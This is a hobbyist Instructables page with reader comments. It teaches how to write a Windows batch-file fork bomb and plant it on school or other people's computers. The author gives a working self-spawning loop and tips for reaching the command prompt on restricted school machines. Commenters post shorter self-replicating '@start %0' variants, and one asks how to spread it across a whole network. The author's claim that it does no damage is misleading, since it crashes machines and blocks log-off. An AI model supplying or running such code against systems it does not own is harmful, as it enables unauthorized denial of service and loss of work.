3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

fork bomb improved for school server computers: see last step for home use

fork bomb improved for school server computers: see last step for home use
This batch file [.bat] is a fork bomb aka rabbit virus. It does not do any damage to a computer but is fun to put on a friend or foes computer at school...

It continuously opens a program you choose, my version opens cmd and itself more than 8 times each time it opens one! so think of it this way, the cmd will open up once, then 8 times, and then those 8 will open up 8 times, and so on... but in matter of seconds. if you leave it running long enough it will crash the computer but most just shut the computer off manually [pushing the power button].

THIS WILL NOT GO ON SERVER ITSELF!!! JUST THE USERS FILE ON THE SERVER! But it still will crash the users computer.

Or there is an easier way i have just learned, but can be cancelled if some one knows what they are doing:

:LOOP
start
GOTO LOOP

Save it as:   [any name u want].bat

I have just recently learned that for some reason [dont know why i didnt put coding there] that this program does not allow the user to log off or turn off computer by clicking start, also it gets worse every time the box shows up saying something like " cant do this application any more, press ok to terminate." as soon as the user hits ok or the x to exit it it will make more and there is so many of those warning boxes that it seems to not be working....Muwahahaha!!
 
Remove these adsRemove these ads by Signing Up
 

Step 1Open up notepad

open up notepad
Ok well the embedded video on my instructable isnt working so here is the html code for the video i wanted to show:

http://www.youtube.com/watch?v=9PWF2BU0WNs&feature=related


The video is not mine, but shows a good example of what a fork bomb can do. Although my fork bomb is faster   :P


On a school server  notepad might be harder to find than just looking for all programs.  I did this whole thing at school so i will tell you how i did it. I first opened up [my computer] then opened up the C drive.
You can't access most of the stuff in here unless you're an admin, however you can use the search tool on the side bar! Search the local C drive and search for command prompt.  

Once you open up cmd [command prompt] you just type in notepad and hit enter and walah! you have notepad!
« Previous StepDownload PDFView All StepsNext Step »
10 comments
Apr 9, 2012. 7:09 PMwill421 says:
I did this with an ahk script which would also overwrite ram, therefore breaking EVERYTHING. MUAHAHA!
So far:
Disables Start Menu
Wantonly breaks startup till you attempt to shutdown.
Errors, errors everywhere.
Lag.
Jul 13, 2011. 8:31 AMSuper_Nerd says:
Very well written instructable. Is there a way to make this run on every computer on the network when one person runs it?
Jul 16, 2011. 11:42 AMSuper_Nerd says:
lol! I learned almost all i know about vbscript and batch from instructables!
Jul 19, 2011. 5:04 PMSuper_Nerd says:
I still remember how i found instructables. I googled vbs commands, and ended up with batch commands. Then I forgot about instructables, but then I came back and have been here since.
Apr 18, 2011. 1:41 AMmichaelb958 says:
Every time I see one of those batch files, I die a little inside. Try this:

@for /L %%i in (1,1,8) do @start %0

Much simpler. Or even this might do the job:

@start %0
@start %0
@start %0
@start %0
@start %0
@start %0
@start %0
@start %0

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
0
Followers
1
Author:jobergy